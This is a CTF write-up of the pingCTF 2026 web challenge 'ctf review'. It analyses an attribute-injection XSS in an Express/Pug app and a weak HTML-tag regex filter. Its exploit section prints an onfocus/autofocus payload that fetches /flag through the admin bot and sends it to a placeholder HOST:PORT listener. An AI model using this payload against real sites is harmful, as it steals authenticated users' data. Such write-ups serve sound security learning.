== CTF Write-Up ===============================================================
Challenge: ctf review
CTF      : pingCTF 2026
Date     : 19.04.2026
Author   : jackfuh - https://jackfuh.de
===============================================================================

--[ Challenge Info

This challenge was part of pingCTF 2026, which ran from 2026-04-18 to
2026-04-19. It was a web challenge called `ctf review`.
Full source code was provided, which I used to identify vulnerabilities and
construct an exploit chain.

--[ Overview & Recon

The target application uses Express.js and Pug templates. The intended workflow
appears to be:

  1. A user downloads a PDF template, which the server assigns a unique formId.
  2. The user fills out the PDF form and re-uploads it.
  3. The user requests an admin review, referencing their formId.

Step 3 triggers a headless Chromium bot (via Puppeteer). The bot runs in an
authenticated context and renders /view?formId=..., which displays the
uploaded PDF's content.

--[ Vulnerability Analysis

After reviewing the source code and scanning it with various tools, I identified
two issues — one of which is sufficient to capture the flag.

  1. XSS in template 'app/views/view.pug'
  2. Content Validation Bypass in 'validatePDF()'

----[ 1. Cross-Site Scripting via Pug's `&attributes`

`app/views/view.pug` renders a PDF content element as follows:

    p(id="pdf-text")&attributes(text)=text.text

The `text` object is built by prepareForAI():

    let content = { style: "color:red", text: "PDF_CONTENT" }

This renders to:

    <p id="pdf-text" style="color:red" text="PDF_CONTENT">...</p>

Because `text.text` is spread into HTML attributes without sanitization, a
double quote in PDF_CONTENT breaks out of the attribute value context. This
allows injection of arbitrary HTML attributes — including event handlers —
enabling JavaScript execution.

----[ 2. Content Validation Bypass in `validatePDF()`

The PDF upload handler filters potentially malicious content using this regex:

    const htmlTagRegex = /<\/?[a-z][\s\S]*>/i;

This only matches angle-bracket-delimited tags (e.g. `<script>`). An attribute
injection payload contains no tag syntax whatsoever, so it passes validation
completely undetected. For example, the following payload would not be caught:

    text" onfocus="alert(1)" autofocus="" tabindex="1

Note: This bypass is not strictly required for the exploit path, but it
confirms the absence of any secondary defense.

--[ Exploit

The goal is to craft a PDF that, when rendered by the admin bot, will:

  1. Fetch the contents of `/flag`
  2. Exfiltrate the flag to an attacker-controlled server

----[ Payload

The following string is injected into the `Text2` field of the PDF:

    x" onfocus="fetch('/flag').then(r=>r.text()).then(t=>fetch('http://HOST:PORT/?'+t))" autofocus="" tabindex="1

When rendered by the Pug template, this produces:

    <p id="pdf-text" ... onfocus="fetch('/flag').then(r=>r.text()).then(t=>fetch('http://HOST:PORT/?'+t))" autofocus="" tabindex="1">...</p>

The `autofocus` attribute causes the element to receive focus immediately on
page load, triggering the `onfocus` handler without any user interaction —
making it ideal for targeting the headless bot.

----[ Steps to Capture the Flag

  1. Start an HTTP listener (e.g. python3 -m http.server PORT).
  2. Open the challenge web app and download the PDF template.
  3. Insert the attribute-injection payload into the `Text2` field and save.
  4. Upload the modified PDF.
  5. Submit it for admin review.
  6. The admin bot loads `/view?formId=...` and the injected `onfocus` handler
     fires automatically via `autofocus`.
  7. Retrieve the flag from your listener's request log.